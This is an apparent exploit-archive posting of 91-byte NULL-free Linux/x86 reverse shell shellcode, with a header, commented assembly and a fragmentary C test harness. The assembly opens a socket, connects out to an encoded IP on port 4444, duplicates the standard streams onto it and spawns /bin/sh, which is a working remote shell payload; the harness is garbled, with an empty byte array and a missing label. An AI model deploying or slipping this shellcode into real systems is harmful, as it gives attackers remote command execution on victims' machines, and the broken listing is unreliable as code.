Linux/x86 Reverse Shell NULL Free Shellcode

91 bytes small Linux/x86 reverse shell NULL free shellcode.

MD5 | 3db8a3b1f503151d8569756ef3829a15

# Exploit Title: Linux/x86 - Reverse Shell NULL free Shellcode (91 bytes)
# Date: 2019-10-16
# Author: bolonobolo
# Tested on: Linux x86
# Software: N/A
# CVE: N/A

global _start

section .text

xor ecx, ecx ; xoring ECX
xor ebx, ebx ; xoring EBX
mul ebx ; xoring EAX and EDX
inc cl ; ECX should be 1
inc bl
inc bl ; EBX should be 2
mov ax, 0x167 ;
int 0x80 ; call socket()

;connect() ; move the return value of socket
xchg ebx, eax ; from EAX to EBX ready for the next syscalls

; push sockaddr structure in the stack
dec cl
push ecx ; unused char (0)

; move the lenght (16 bytes) of IP in EDX
mov dl, 0x16

; the ip address could be to avoid NULL bytes
mov ecx, 0x04030382 ; mov ip in ecx
sub ecx, 0x03030303 ; subtract from ip
push ecx ; load the real ip in the stack
push word 0x5c11 ; port 4444
push word 0x02 ; AF_INET family
lea ecx, [esp]
; EBX still contain the value of the
opened socket
mov ax, 0x16a
int 0x80

; dup2()
xor ecx, ecx
mov cl, 0x3

xor eax, eax
; EBX still contain the value of the
opened socket
mov al, 0x3f
dec cl
int 0x80
jnz dup2

; execve() from the previous polymorphic analysis 25 bytes
cdq ; xor edx
mul edx ; xor eax
lea ecx, [eax] ; xor ecx
mov esi, 0x68732f2f
mov edi, 0x6e69622f
push ecx ; push NULL in stack
push esi ; push hs/ in stack
push edi ; push nib// in stack
lea ebx, [esp] ; load stack pointer to ebx
mov al, 0xb ; load execve in eax
int 0x80


unsigned char code[] = \

void main()

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;



Related Posts